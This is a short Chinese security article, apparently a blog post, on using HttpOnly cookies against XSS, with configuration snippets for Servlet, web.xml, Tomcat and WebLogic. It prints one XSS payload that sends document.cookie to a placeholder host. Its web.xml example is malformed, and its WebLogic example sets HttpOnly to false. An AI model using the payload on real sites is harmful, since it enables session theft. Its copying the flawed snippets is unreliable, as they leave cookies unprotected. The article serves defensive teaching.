漏洞概述
在Web安全领域,跨站脚本攻击时最为常见的一种攻击形式,也是长久以来的一个老大难问题,HTTP-only cookie是一种用以缓解跨站脚本攻击的技术,如果您在cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS盗取用户cookie。
攻击步骤
- 测试并发现一个存在XSS漏洞网站。
- 通过XSS漏洞,插入恶意链接:
<img src=‘http://xxxx/cookie.php?cookie='+encodeURIComponent(document.cookie)>
- 当其他用户访问相关页面时,恶意插入的代码被执行,用户的cookie信息被发送到恶意链接地址。
设置方法
-
Servlet2.5及以下版本,不支持httpOnly,可通过response.addHeader或response.setHeader设置httponly。
(1)response.addHeader//设置cookie response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly"); //设置多个cookie response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly"); response.addHeader("Set-Cookie", "timeout=30; Path=/test; HttpOnly"); //设置https的cookie response.addHeader("Set-Cookie", "uid=112; Path=/; Secure; HttpOnly");
(2)response.setHeader
response.setHeader("Set-Cookie","cookiename=value;Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly");
-
Servlet3.0提供SessionCookieConfig接口,用于操作会话Cookie,其中有setHttpOnly(boolean httpOnly) 设置是否支持HttpOnly属性。
cookie.setHttpOnly(true);
-
也可以在web.xml配置如下:
<session-config> <cookie-config> <http-only>true</http-only> </cookie-config> <session-config>
-
对于tomcat6支持对JSESSIONID的cookie设置HttpOnly,
具体的设置是在context.xml配置文件中进行设置的,为Context标签添加如下属性即可开启或禁止HttpOnly:<Context useHttpOnly="true"/>
-
对于weblogic,可以在weblogic.xml里添加
<session-descriptor> <cookie-http-only>false</cookie-http-only> </session-descriptor>
关注公众号,一起分享实用安全技术,关注安全最新事件,记录工作常见问题,吐槽生活真心操蛋。